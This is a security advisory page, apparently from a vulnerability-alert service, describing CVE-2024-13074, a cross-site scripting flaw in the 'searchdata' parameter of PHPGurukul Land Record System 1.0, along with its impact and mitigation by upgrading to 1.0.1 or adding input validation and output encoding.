Platform
php
Component
land-record-system
Fixed in
1.0.1
CVE-2024-13074 describes a problematic cross-site scripting (XSS) vulnerability discovered in PHPGurukul Land Record System version 1.0. This flaw allows attackers to inject malicious scripts, potentially leading to data theft and session hijacking. The vulnerability impacts version 1.0 and is resolved in version 1.0.1, which users are strongly encouraged to apply.
The XSS vulnerability in Land Record System allows an attacker to inject arbitrary JavaScript code into the application. This code can then be executed in the context of a victim's browser when they visit a compromised page. Attackers could leverage this to steal sensitive information, such as user credentials or personal data stored within the application. Furthermore, an attacker could hijack user sessions, gaining unauthorized access to the Land Record System and potentially manipulating data or performing actions on behalf of legitimate users. The impact is amplified if the system handles sensitive land ownership records, as attackers could potentially alter or view confidential information.
This vulnerability has been publicly disclosed, increasing the likelihood of exploitation. While the CVSS score is LOW, the ease of exploitation and potential impact on sensitive data warrant immediate attention. No known active campaigns or proof-of-concept exploits have been publicly reported as of the publication date, but the public disclosure makes it a target. The vulnerability was published on 2024-12-31.
Exploit Status
EPSS
0.13% (32% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2024-13074 is to upgrade to version 1.0.1 of the Land Record System. This version includes a fix for the XSS vulnerability. If upgrading immediately is not possible, consider implementing input validation and output encoding on the 'searchdata' parameter in /index.php to sanitize user-supplied input. Web application firewalls (WAFs) configured to detect and block XSS payloads can also provide a temporary layer of protection. Regularly review and update input validation routines to prevent similar vulnerabilities from arising.
Update to a patched version or apply the necessary security measures to prevent the execution of XSS (Cross-Site Scripting) code. Validate and sanitize user inputs, especially the 'searchdata' parameter, before displaying them on the page.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-13074 is a cross-site scripting (XSS) vulnerability in PHPGurukul Land Record System version 1.0, allowing attackers to inject malicious scripts via the 'searchdata' parameter.
You are affected if you are using PHPGurukul Land Record System version 1.0. Upgrade to version 1.0.1 to resolve the vulnerability.
Upgrade to version 1.0.1. As a temporary measure, implement input validation and output encoding on the 'searchdata' parameter.
While no active campaigns are confirmed, the vulnerability has been publicly disclosed, increasing the risk of exploitation.
Refer to the PHPGurukul website or security advisories for the official advisory regarding CVE-2024-13074.
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.